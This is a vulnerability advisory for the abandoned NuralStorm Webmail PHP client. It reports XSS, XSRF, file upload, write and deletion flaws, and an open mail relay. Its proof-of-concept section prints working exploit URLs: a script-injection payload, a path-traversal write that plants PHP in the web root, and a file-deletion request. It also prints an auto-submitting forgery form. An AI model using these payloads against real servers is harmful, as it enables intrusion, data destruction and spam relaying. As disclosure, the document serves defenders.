NuralStorm Webmail Multiple Vulnerabilities

30 November -0001

A recent code audit of the NuralStorm Webmail system revealed a number of serious vulnerabilities. If you are using NuralStorm please review the following vulnerability report. It is recommended that you restrict access to any NuralStorm installations immediately and disable NuralStorm if possible. There is currently no patch or work around for the vulnerabilities described below.

Description of Vulnerability:

NuralStorm Webmail is an Open Source web based e-mail client written in PHP. NuralStorm is distributed from http://www.nuralstorm.net/.

NuralStorm Webmail contains a cross site scripting (XSS) vulnerability because it fails to sanitize output of HTML e-mail before display. This vulnerability is particularly dangerous because NuralStorm keeps login credentials stored in cookie values. This combination of vulnerability and architecture means that attackers can steal login credentials via JavaScript injection into mail sent to targeted users.

NuralStorm contains multiple stored XSS vulnerabilities in the addressbook functionality because nickname and e-mail address values are not sanitized before display.

NuralStorm contains an arbitrary file upload vulnerability because it fails to sanitize the value of variables stored in client side cookies (COOKIE_SESSSION) before using these variables to determine upload locations. This vulnerability could allow attackers who can compose messages to upload arbitrary PHP to the NuralStorm server to directories that are writable by the web server.

NuralStorm is also vulnerable to numerous cross site request forgery (XSRF) attacks because forms for input do not have any protection mechanisms, such as one time tokens, implemented.

NuralStorm contains an information disclosure vulnerability because it does not sanitize input to the book.php page. Attackers requesting a URL could expose the addressbook of the valid system users.

NuralStorm contains a reflected XSS vulnerability in book_include.php because it fails to sanitize the BGCOLOR parameter before it is included in the page display. Attackers can exploit this vulnerability via URL.

NuralStorm contains an arbitrary file deletion vulnerability in maintenance.php. Attackers can use URL variables to cause the web server to delete arbitrary files.

NuralStorm allows arbitrary email to be relayed via problems.php without authentication. This vulnerability can be exploited via maliciously crafted URL parameters.

NuralStorm settings.php contains an unauthenticated arbitrary file write vulnerability. Attackers can use this vulnerability to write arbitrary PHP to directories writable by the web server. This vulnerability could be used to inject PHP shell backdoors.

Systems affected:

NuralStorm 0.985 b was tested and shown to be vulnerable.

Impact

Highly critical. Attackers could use XSS in message sent to victims to perform all of the attacks described above, including the arbitrary file upload attack. Using the proof of concept below unauthorized attackers can write arbitrary PHP with privileges of the web server. This could lead to PHP shell injection and web server compromise. A denial of service threat exists where the web server has access to delete files.

Proof of Concept

book.php information disclosure vulnerabilty can be exploited using a URL such as book.php?USE_ADDRESS_BOOK=1&COOKIE_SESSION=bob@ where 'bob' is a valid user name.

book_include.php reflected XSS can be exploited using a URL such as book_include.php?USE_ADDRESS_BOOK=1&ADDRESS_BOOK_MESSAGE=1&BGCOLOR1="><script>alert('xss');</script><"

maintenance.php can be exploited using the URL maintenance.php?UPLOAD_DIR=/var/www/html/webmail/ which would delete any files the web server had permissions to delete in that directory.

Problems.php can be exploited using the URL problems.php?mail=1&problem=Spammy%20message&TECH_EMAIL=bob@localhost&name=spammy%20mcspammer&email=root@localhost which will send the message to the recipient bob@localhost.

The settings.php arbitrary file write is a two step process. The first URL is used to create a file in the options/ directory used to store settings. This can be done with the URL settings.php?set=1&USE_SETTINGS=1&COOKIE_SESSION=1. Next the following URL can be used to write arbitrary PHP to the file info.php in the NuralStorm root: settings.php?set=1&USE_SETTINGS=1&COOKIE_SESSION=1/../../info.php&name=<?php phpinfo();?>. This file can then be accessed using /info.php.

The XSRF vulnerabilities in NuralStorm can be exploited in a manner similar to the this proof of concept. The following HTML will silently mail a message if a logged in users visits the page (where 10.0.0.2 is the NuralStorm webmail host):

<html>
<body onload="javascript:document.compose.submit();">
<form method="post" action="http://10.0.0.2/message.php?go=/webmail/message" name="compose" id="compose" enctype="multipart/form-data">
<input type="hidden" name="mail" value="true">
<input type="hidden" name="ignore" value="true"> <!-- Ignore any errors -->
<input type="hidden" name="attachmentAction" value="send">
<input type="text" name="from" value="bob@localhost">
<input type="text" name="to" value="bob@localhost">
<input type="text" name="subject" value="XSRF Message">
<input type="text" name="body" value="XSRF test message from/to bob.">
</form>
</body>

</html>

Further vulnerability and proof of concept exist but will not be enumerated at this time.

Vendor Response

Contact attempts with vendor have been unsuccessful, emails to all published contacts (including domain registrants) bounced. The project was last updated nearly 8 years ago so it is reasonable to assume that it has been abandoned.